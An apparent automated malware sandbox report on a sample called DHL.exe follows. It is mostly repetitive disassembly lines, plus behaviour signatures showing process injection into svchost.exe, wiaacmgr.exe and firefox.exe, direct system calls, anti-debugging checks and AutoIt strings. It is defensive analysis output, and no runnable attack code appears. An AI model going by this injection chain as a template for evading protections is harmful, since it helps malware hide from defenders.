                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]2_2_0345EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]2_2_0345EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]2_2_034F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]2_2_034F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEBD0 mov eax, dword ptr fs:[00000030h]2_2_034DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EBFC mov eax, dword ptr fs:[00000030h]2_2_0345EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BCBF0 mov eax, dword ptr fs:[00000030h]2_2_034BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]2_2_03440BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]2_2_03440BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]2_2_034E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]2_2_034E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]2_2_03440A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]2_2_03440A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEA60 mov eax, dword ptr fs:[00000030h]2_2_034DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]2_2_034ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]2_2_034ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BCA11 mov eax, dword ptr fs:[00000030h]2_2_034BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA24 mov eax, dword ptr fs:[00000030h]2_2_0346CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EA2E mov eax, dword ptr fs:[00000030h]2_2_0345EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]2_2_03454A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]2_2_03454A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA38 mov eax, dword ptr fs:[00000030h]2_2_0346CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430AD0 mov eax, dword ptr fs:[00000030h]2_2_03430AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]2_2_03464AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]2_2_03464AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]2_2_0346AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]2_2_0346AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504A80 mov eax, dword ptr fs:[00000030h]2_2_03504A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468A90 mov edx, dword ptr fs:[00000030h]2_2_03468A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]2_2_03438AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]2_2_03438AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486AA4 mov eax, dword ptr fs:[00000030h]2_2_03486AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0946 mov eax, dword ptr fs:[00000030h]2_2_034B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504940 mov eax, dword ptr fs:[00000030h]2_2_03504940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]2_2_0347096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov edx, dword ptr fs:[00000030h]2_2_0347096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]2_2_0347096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]2_2_034D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]2_2_034D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC97C mov eax, dword ptr fs:[00000030h]2_2_034BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]2_2_034AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]2_2_034AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC912 mov eax, dword ptr fs:[00000030h]2_2_034BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]2_2_03428918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]2_2_03428918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B892A mov eax, dword ptr fs:[00000030h]2_2_034B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C892B mov eax, dword ptr fs:[00000030h]2_2_034C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C69C0 mov eax, dword ptr fs:[00000030h]2_2_034C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034649D0 mov eax, dword ptr fs:[00000030h]2_2_034649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA9D3 mov eax, dword ptr fs:[00000030h]2_2_034FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE9E0 mov eax, dword ptr fs:[00000030h]2_2_034BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]2_2_034629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]2_2_034629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]2_2_034309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]2_2_034309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov esi, dword ptr fs:[00000030h]2_2_034B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]2_2_034B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]2_2_034B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03442840 mov ecx, dword ptr fs:[00000030h]2_2_03442840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460854 mov eax, dword ptr fs:[00000030h]2_2_03460854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]2_2_03434859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]2_2_03434859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]2_2_034BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]2_2_034BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]2_2_034C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]2_2_034C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC810 mov eax, dword ptr fs:[00000030h]2_2_034BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A00B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00A00B62
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009D2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009D2622
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009C083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009C083F
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009C09D5 SetUnhandledExceptionFilter,0_2_009C09D5
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009C0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_009C0C21

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtUnmapViewOfSection: Direct from: 0x77462D3CJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtProtectVirtualMemory: Direct from: 0x77457B2EJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtOpenKeyEx: Direct from: 0x77463C9CJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtClose: Direct from: 0x77462B6C
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtTerminateThread: Direct from: 0x77462FCCJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtQueryValueKey: Direct from: 0x77462BECJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
                Source: C:\Users\user\Desktop\DHL.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\wiaacmgr.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: NULL target: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: NULL target: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeThread register set: target process: 8020Jump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeThread APC queued: target process: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeJump to behavior
                Source: C:\Users\user\Desktop\DHL.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 681008Jump to behavior
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A01201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00A01201
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009E2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_009E2BA5
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A0B226 SendInput,keybd_event,0_2_00A0B226
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A222DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_00A222DA
                Source: C:\Users\user\Desktop\DHL.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL.exe"Jump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeProcess created: C:\Windows\SysWOW64\wiaacmgr.exe "C:\Windows\SysWOW64\wiaacmgr.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A00B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00A00B62
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A01663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00A01663
                Source: DHL.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: DHL.exe, eYHtcsfFquWF.exe, 00000004.00000000.1627664270.0000000001100000.00000002.00000001.00040000.00000000.sdmp, eYHtcsfFquWF.exe, 00000004.00000002.2708787762.0000000001100000.00000002.00000001.00040000.00000000.sdmp, eYHtcsfFquWF.exe, 00000006.00000000.1781545042.0000000001121000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
